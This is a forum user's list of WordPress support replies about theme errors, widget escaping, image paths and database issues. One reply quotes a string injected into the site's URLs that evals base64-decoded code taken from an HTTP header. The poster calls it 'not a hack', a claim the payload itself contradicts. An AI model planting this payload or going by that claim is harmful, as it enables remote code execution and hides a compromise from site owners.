warebloke
Forum Replies Created
-
Forum: Plugins
In reply to: Disable a custom fieldthe current theme is Puretype and is using it to display the old thumbnails actually within posts whereas the previous theme was revolution magazine which only used the thumbnails to display on the homepage.
we just want to shut off the display of any custom field thumbnail prior to post id 22486 – is that possible?
fixed it, was not on latest WP
Forum: Fixing WordPress
In reply to: Saving Code in sidebar widget adds “\” everywhereHas no-one else had this trouble, looks like a magic quotes issue but can not seem to fix it..
Forum: Fixing WordPress
In reply to: Saving Code in sidebar widget adds “\” everywhereI have deactivated all plugins and still have the same problem, anyone offer any advice?
Tks
Forum: Fixing WordPress
In reply to: Image URL not correctOk I fixed it crudely, simply moved the storage folder of images – and named and placed it where it was being looked for.
Forum: Fixing WordPress
In reply to: None of my users are foundI found the issue – thanks for asking. It was a database error within phpmyadmin, it created a new db for some bizarre reason and left all users on wp_ yet created a new db wp_1_ with no users, renamed the files all working fine! wew
Forum: Fixing WordPress
In reply to: WP adding code to the end of url links breaking themThis just started to happen on our site today too
/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%/
Is not a hack as is not affecting all Urls.
Anyone else have the same problem?
Forum: Themes and Templates
In reply to: P2 Theme with a fatal error – worked initially ok?I managed to fix this by simply changing the PHP version from 4 to 5. It seems version 4 does not work with P2.
Forum: Fixing WordPress
In reply to: Fatal Error in P2 – line 352It was using PHP 4 on Media Temple, changed it to PHP 5 and hey presto works!
Thanks
Forum: Themes and Templates
In reply to: P2 Theme with a fatal error – worked initially ok?It may also help to add that there are zero plugins on this theme
Forum: Themes and Templates
In reply to: P2 Theme with a fatal error – worked initially ok?This is still not solved guys, thanks
Forum: Fixing WordPress
In reply to: Fatal Error in P2 – line 352I just re-installed WP to check if that was the problem, but nothing changed. Any thoughts?